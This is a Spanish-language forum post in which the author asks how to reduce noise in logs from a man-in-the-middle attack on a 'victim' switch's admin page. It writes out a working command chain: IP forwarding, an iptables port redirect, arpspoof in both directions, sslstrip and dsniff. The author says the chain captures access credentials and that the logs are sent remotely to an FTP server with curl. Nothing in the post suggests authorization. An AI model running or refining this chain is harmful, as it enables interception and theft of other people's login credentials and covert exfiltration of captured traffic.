Hola, Mi nombre es Guillermo y recurro a esta pagina y a sus miembros para pedir ayuda con un problema que no entiendo de donde proviene, cuando hago un mitm entre la pc cliente y el router con los comandos:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
arpspoof -i eth0 -t ip_switch_victima ip_router
arpspoof -i eth0 -t ip_router ip_pc_victima
sslstrip -k -l 8080 -w /archivo.log
estos me funcionan de maravilla capturando los datos de acceso de las paginas, pero el inconveniente que surge es que tambien captura mucha basura de paginas chinas y no entiendo el porque, si el mitm lo estoy realizando entre el router y el switch victima solo eso tendria que ver, el swicth victima que para ingresar se usa su propia pagina web y que redirijo hacia el 8080 que es el escucha del sslstrip, como he dicho antes, funciona pero no se como quitar la informacion inecesaria que se graba en el archivo y hace que pese varios megas, hice un ensayo cambiando el puerto de redireccion y tampoco deja de capturar basura, utilice el comando:
dsniff -t 23/tcp=telnet -n
que en teoria deberia solo capturar lo del puerto 23 de telnet y en este caso lo hace, pero tambien como el ejm anterior captura muchisima basura...
Por favor si alguien me puede ayudar le estare agradecido, me genera archivos de mas de 100 megas, y no es logico ya que es solo la comunicacion de la pagina web del swicht y el router, al hacer esto remotamente y enviarlo con el comando curl a un ftp me deja vulnerable a que alguien con wireshark detecte mis credenciales de entrada al ftp, gracias.